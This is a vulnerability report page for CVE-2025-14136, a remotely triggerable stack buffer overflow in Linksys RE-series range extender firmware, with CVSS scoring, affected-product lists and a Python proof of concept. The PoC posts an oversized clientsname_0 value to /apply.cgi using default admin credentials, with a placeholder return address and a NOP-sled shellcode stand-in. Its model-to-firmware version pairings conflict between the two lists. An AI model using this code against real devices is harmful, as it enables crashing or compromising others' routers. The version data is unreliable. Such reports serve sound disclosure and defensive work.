Security Vulnerability Report
CVE-2025-14136 CVSS 8.8 HIGH

Published: 2025-12-06 13:16:00
Last Modified: 2025-12-10 18:00:04

Description

A security flaw has been discovered in Linksys RE6500, RE6250, RE6300, RE6350, RE7000 and RE9000 1.0.013.001/1.0.04.001/1.0.04.002/1.1.05.003/1.2.07.001. This vulnerability affects the function RE2000v2Repeater_get_wired_clientlist_setClientsName of the file mod_form.so. The manipulation of the argument clientsname_0 results in stack-based buffer overflow. The attack may be launched remotely. The exploit has been released to the public and may be exploited. The vendor was contacted early about this disclosure but did not respond in any way.

CVSS Details

CVSS Score: 8.8
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:o:linksys:re6500_firmware:1.0.013.001:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:linksys:re6500:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:o:linksys:re6250_firmware:1.0.04.001:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:linksys:re6250:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:o:linksys:re6300_firmware:1.2.07.001:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:linksys:re6300:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:o:linksys:re6350_firmware:1.0.04.001:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:linksys:re6350:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:o:linksys:re7000_firmware:1.1.05.003:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:linksys:re7000:-:*:*:*:*:*:*:* - NOT VULNERABLE
Linksys RE6500 firmware 1.0.013.001
Linksys RE6250 firmware 1.0.04.001
Linksys RE6300 firmware 1.0.04.002
Linksys RE6350 firmware 1.1.05.003
Linksys RE7000 firmware 1.2.07.001
Linksys RE9000 firmware 1.0.013.001/1.0.04.001/1.0.04.002/1.1.05.003/1.2.07.001

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3
"""
CVE-2025-14136 PoC - Linksys RE Series Buffer Overflow
Note: This PoC is for educational and security research purposes only.
"""
import requests
import sys

TARGET_IP = "192.168.1.1"  # Replace with target device IP
TARGET_PORT = 80
USERNAME = "admin"  # Default credentials
PASSWORD = "admin"


def create_exploit_payload():
    """Generate overflow payload"""
    # Buffer size for the vulnerable function
    buffer_size = 256
    # Padding to fill the buffer
    padding = b'A' * buffer_size
    # Overwrite return address (example address)
    return_addr = b'\x42\x42\x42\x42'
    # Shellcode placeholder
    shellcode = b'\x90' * 100
    payload = padding + return_addr + shellcode
    return payload


def exploit_cve_2025_14136():
    """Send exploit request to vulnerable endpoint"""
    target_url = f"http://{TARGET_IP}:{TARGET_PORT}/apply.cgi"
    headers = {
        'User-Agent': 'Mozilla/5.0',
        'Content-Type': 'application/x-www-form-urlencoded'
    }
    # Vulnerable parameter: clientsname_0
    data = {
        'clientsname_0': create_exploit_payload(),
        'submit_button': 'Wizard',
        'change_action': 'gozila_cgi'
    }
    print(f"[*] Target: {target_url}")
    print(f"[*] Sending exploit payload...")
    print(f"[*] Payload size: {len(create_exploit_payload())} bytes")
    try:
        response = requests.post(target_url, data=data, headers=headers, timeout=10)
        print(f"[+] Request sent. Status code: {response.status_code}")
        return True
    except requests.exceptions.RequestException as e:
        print(f"[-] Request failed: {e}")
        return False


if __name__ == '__main__':
    print("=" * 60)
    print("CVE-2025-14136 Linksys RE Series Buffer Overflow PoC")
    print("=" * 60)
    exploit_cve_2025_14136()

References

Raw JSON Data
